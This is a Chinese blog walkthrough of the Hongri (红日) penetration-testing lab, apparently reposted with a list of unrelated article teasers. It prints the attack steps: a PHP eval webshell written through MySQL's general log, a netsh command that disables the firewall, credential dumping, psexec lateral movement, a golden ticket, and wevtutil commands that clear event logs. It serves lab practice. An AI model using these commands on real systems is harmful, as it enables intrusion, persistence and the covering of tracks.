红日靶场通关

初始准备

首先是网络配置,看教程来的,我配置完的效果如下

windows7:(内:192.168.52.143 / 外:192.168.154.136)
windows2003:(内:192.168.52.141)
windows2008:(内:192.168.52.138)

kali:192.168.154.139  

win7外网的IP是自动获取的,每个人都不一样!

检查windows是否和我们的物理机以及外网相通:

ping通说明配置成功 。

配置完成后给四 台虚拟机拍快照

渗透测试

Kail进入phpadmin后台

扫描192.168.154.0网段(win7和外网连接的网卡)

nmap 192.168.154.0/24

也是扫描到了win7的IP以及他开放的端口 

然后扫描80(HTTP)和3306(MYSQL)端口

nmap 192.168.154.136 -p80,3306 -A -sV

-A(全面扫描) -sV(服务版本探测)

 然后扫描http://192.168.154.136/目录

dirb使用

-a     设置user-agent
-p     <proxy[:port]>设置代理
-c     设置cookie
-z     添加毫秒延迟,避免洪水攻击
-o     输出结果
-X     在每个字典的后面添加一个后缀
-H     添加请求头
-i     不区分大小写搜索

dirb http://192.168.154.136

这是我们想要扫描出来的东西,然后就知道了数据库管理工具的网络路径

浏览器访问后台  http://192.168.154.136/phpmyadmin/

root/root 弱密码登录 

成功登录 ,下一步就是尝试利用MYSQL日志在中写入木马,也叫shell

查看日志信息

SHOW VARIABLES LIKE '%general%'   

打开日志

日志读写默认是关闭的,所以我们要打开

SET GLOBAL general_log='on';      

 将MySQL的通用查询日志(general query log)的输出文件设置为指定的路径。

 set global general_log_file = 'C:/phpStudy/WWW/2.php'

  写入一句话木马

 SELECT '<?php @eval($_POST["cmd"]);?>'  

访问2.php,发现成功访问

然后上蚁剑连接 

网站就是内个,密码就是cmd

 然后就是用cs了,cs配置就不写了,就写用法了

创建监听器

创建 windows 可执行 exe 程序 

利用蚁剑上传后门,并启动 

然后就开始内网渗透 

回连间隔改为0(这只是靶场操作,实战不要用容易被gangan)

关闭防火墙(上线就关闭防火墙养成好习惯)

        shell netsh advfirewall set allprofiles state off        

 然后就要去提权

成功提权 记得修改将system的回连间隔也修改为0

内网信息收集


 简单的信息收集

shell ipconfig                                                                                         //查看网络

shell net user                                           //查看本地用户

shell net view                                                 //列举计算机名

shell net config Workstation        //查看当前计算机名、域、登录域等信息

shell net view /domain                                //看看几个域

这里得知52为内网网段 ,并且只有一个域

端口扫描

        浏览探测—>端口扫描—>52内网段

扫描结果如上

抓取明文密码

        抓明文密码等下横向要用

        凭证提权—>抓取明文密码

的知密码为123.com 

内网横向

        刚刚我们端口扫描的时候发现开放了445端口,可以创建SMB监听隧道

     (Windows上的SMB(Server Message Block)协议是一种网络文件共享协议,它允许用户在网络上的计算机之间访问文件和打印机等资源。)

 

切换攻击目标列表

右建选择—> 横向移动 —> psexec 

添加 用户名 密码 域名 -> 监听器 -> 对端连接的隧道

        监听器选择我们刚刚创建的SMB监听器,对端连接的隧道选择system权限的

 横向成功,进入域控,记得养成好习惯关防火墙 

权限维持(黄金票据)

黄金票据是指能够绕过认证授权(Authentication and Authorization)机制并获得所需权限的票据。这种票据可以被攻击者收集和利用,从而从系统内部获取高权限,甚至完全控制系统。

抓取 Hash 还有明文密码

        把SID,域名,复制下来等下黄金票据要用

        SID: S-1-5-20

        域名:GOD.ORG

 

 

黄金票据配置

        凭证提权—>黄金票据

成功配置,舒服了 

痕迹清除


        在渗透过程中,痕迹清除非常非常重要,不清除万一被溯源,容易被gangan

shell wevtutil cl security    //清理安全日志
shell wevtutil cl system        //清理系统日志
shell wevtutil cl application        //清理应用程序日志
shell wevtutil cl "windows powershell"    //清除power shell日志
shell wevtutil cl Setup     //清除(cl)事件日志中的 "Setup" 事件。

完结撒花。。。

也是完成了,弄了两天多,人生中第一次完整的渗透测试,

以前看别的博主最后都会写一段励志语,我也来一段

“生活总是让我们遍体鳞伤,但到后来,那些受伤的地方一定会变成我们最强壮的地方。”

                                                                                                        —— 海明威《永别了武器》

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/1535083.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

计算机毕业设计 智慧物业服务系统的设计与实现 Java+SpringBoot+Vue 前后端分离 文档报告 代码讲解 安装调试

&#x1f34a;作者&#xff1a;计算机编程-吉哥 &#x1f34a;简介&#xff1a;专业从事JavaWeb程序开发&#xff0c;微信小程序开发&#xff0c;定制化项目、 源码、代码讲解、文档撰写、ppt制作。做自己喜欢的事&#xff0c;生活就是快乐的。 &#x1f34a;心愿&#xff1a;点…

几种mfc140u.dll常见错误情况,以及mfc140u.dll文件修复的方法

如果你遇到与mfc140u.dll 文件相关的错误&#xff0c;这通常指的是该mfc140u.dll文件可能丢失、损坏或与您的应用程序不兼容。详细分析关于mfc140u.dll文件错误会对系统有什么影响&#xff0c;mfc140u.dll文件处于什么样的位置&#xff1f;以下是几种常见的错误情况及其修复方法…

[今日Arxiv] LLM推理中的错误自迭代改进,DeepMind

最近思维链微调范式很火&#xff0c;翻出来DeepMind的文章分享出来。 大致讲了推理过程中的自改进迭代思路&#xff0c;注重推理过程。 来自 1UC Berkeley, 2Google DeepMind, ♦Work done during an internship at Google DeepMind 的文章 文章标题&#xff1a; Scaling L…

【目标检测】labelimg图像标注软件的使用流程

一、labelimg检测图片标注 1、下载labelimg.exe 链接&#xff1a;https://pan.baidu.com/s/1yk8ff56Xu40-ZLBghEQ5nw 提取码&#xff1a;vj8f 下载的文件是编译好的&#xff0c;可执行的labelImg.exe文件。直接将文件放在windows环境下&#xff0c;双击可执行。&#xff08;如果…

[Linux入门]---使用exec函数实现简易shell

文章目录 1.简易实现2.人机交互&#xff0c;获取命令行3.命令行分割4.执行命令5.内建命令6.myshell代码 1.简易实现 2.人机交互&#xff0c;获取命令行 代码如下&#xff1a; int quit0; #define LEFT "[" #define RIGHT "]" #define LABLE "#&quo…

无线安全(WiFi)

免责声明:本文仅做分享!!! 目录 WEP简介 WPA简介 安全类型 密钥交换 PMK PTK 4次握手 WPA攻击原理 网卡选购 攻击姿态 1-暴力破解 脚本工具 字典 2-Airgeddon 破解 3-KRACK漏洞 4-Rough AP 攻击 5-wifi钓鱼 6-wifite 其他 WEP简介 WEP是WiredEquivalentPri…

小程序开发之我见

现在越来越多的人在用微信&#xff0c;不管是工作还是生活&#xff0c;很多都离不开微信&#xff0c;不管是吃饭、买东西&#xff0c;手机内存虽然在增加&#xff0c;但是也总觉得不够用&#xff0c;然后也不喜欢装太多的软件&#xff0c;所以微信小程序越来越多人喜欢用&#…

随着Batch size增加,最佳learning rate如何选择?

最近读到《Surge Phenomenon in Optimal Learning Rate and Batch Size Scaling》这篇论文&#xff0c;里面通过实验和理论证明了learning rate和batch size之间的关系&#xff0c;觉得很有意思&#xff0c;就简答写个blog记录下。 1. 简介 在影响模型训练效果的所有参数中&a…

PD虚拟机占用多少内存?使用电脑的虚拟内存会损害电脑吗

当我们讨论虚拟机及其对电脑性能的影响时&#xff0c;常常会出现两个关键问题&#xff1a;“PD虚拟机需要占用多少内存&#xff1f;”以及“启用电脑的虚拟内存是否会损害硬件&#xff1f;”对于依赖虚拟机进行日常工作的用户而言&#xff0c;这些问题尤为重要。 在本文中&…

Qt_按钮类控件

目录 1、QAbstractButton 2、设置带图标的按钮 3、设置带有快捷键的按钮 4、QRadioButtion&#xff08;单选按钮&#xff09; 4.1 QButtonGroup 5、QCheckBox 结语 前言&#xff1a; 按钮类控件是Qt中最重要的控件类型之一&#xff0c;该类型的控件可以通过鼠标的点击…

【案例72】Apache检测到目标 URL 存在 http host 头攻击漏洞的解决方案

在网络安全中&#xff0c;我们经常会遇到各种漏洞和攻击&#xff0c;其中 http host 头攻击漏洞是一种比较常见的安全问题。最近&#xff0c;我在处理一个项目时&#xff0c;检测到目标 URL 存在 http host 头攻击漏洞&#xff0c;下面我将分享两种Apache解决这个问题的方法。 …

浅谈线性表——队列

文章目录 一、什么是队列&#xff1f;二、队列底层三、自我实现一个队列3.1、链式存储3.1.1、单向链表实现队列的实现代码3.1.2、双向链表实现队列的实现代码 3.2、顺序存储3.2.1、循环队列的实现代码 一、什么是队列&#xff1f; 队列是只允许在一端进行插入数据操作&#xf…

性能诊断的方法(五):架构和业务诊断

关于性能诊断的方法&#xff0c;我们可以按照“问题现象—直接原因—问题根源”这样一个思路去归纳。我们先从问题的现象去入手&#xff0c;包括时间的分析、资源的分析和异常信息的分析。接下来再去分析产生问题现象的直接原因是什么&#xff0c;这里我们归纳了自上而下的资源…

Streaming OpenAI results from a Lambda function using Python

题意&#xff1a;使用 Python 从 Lambda 函数流式传输 OpenAI 结果 问题背景&#xff1a; Im trying to stream results from Open AI using a Lambda function on AWS using the OpenAI Python library. For the invoke mode I have: RESPONSE_STREAM. And, using the exampl…

调用智谱AI异步请求流式方法回复

官方代码可以去查看https://github.com/MetaGLM/zhipuai-sdk-java-v4/blob/main/src/test/java/com/zhipu/oapi/AllToolsTest.java 效果展示 提问效果: 回答效果: 1、Maven配置 <dependency><groupId>cn.bigmodel.openapi</groupId><artifactId>…

怎么很多张图片拼接成一张?试试这几种图片拼接方法!

怎么很多张图片拼接成一张&#xff1f;在繁忙的现代生活中&#xff0c;我们不断地捕捉和累积着各式各样的图像&#xff0c;它们如同记忆的珍珠&#xff0c;串联起生活的每一个瞬间&#xff0c;然而&#xff0c;随图片数量的激增&#xff0c;管理它们成为了一项挑战&#xff0c;…

JavaScript --函数作用域变量的使用规则(局部和访问)

访问规则&#xff0c;就近原则 <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><meta http-equiv"X-UA-Compatible" content"IEedge"><meta name"viewport" content"w…

通过实时平衡生物反馈系统和XSENS动捕系统,改善康复训练流程

最新研究表明&#xff0c;通过将Xsens动作捕捉技术与创新的实时生物反馈设备相结合&#xff0c;可以有效改善患者的康复治疗方式。该解决方案有望显著提高患者的平衡控制和康复效果&#xff0c;帮助其应对各种平衡和运动挑战。 案例关键点一览 一种改善平衡训练的新装置&#x…

C++:STL详解(一)string类的基本介绍与使用方式

✨ Blog’s 主页: 白乐天_ξ( ✿&#xff1e;◡❛) &#x1f308; 个人Motto&#xff1a;实践是检验真理的唯一标准&#xff01;&#xff01;&#xff01;敲代码需要勤快点&#xff01;&#xff01;&#xff01;&#xff01; &#x1f4ab; 欢迎来到我的学习笔记&#xff0…

2024年度10款视频剪辑软件分享

在视频创作日益盛行的今天&#xff0c;一款强大而易于上手的视频剪辑软件成为了每位创作者不可或缺的工具。无论是专业电影制作人、Vlog博主&#xff0c;还是视频编辑爱好者&#xff0c;都能在市场上找到适合自己的那一款。以下是2024年度推荐的10款视频剪辑软件&#xff0c;涵…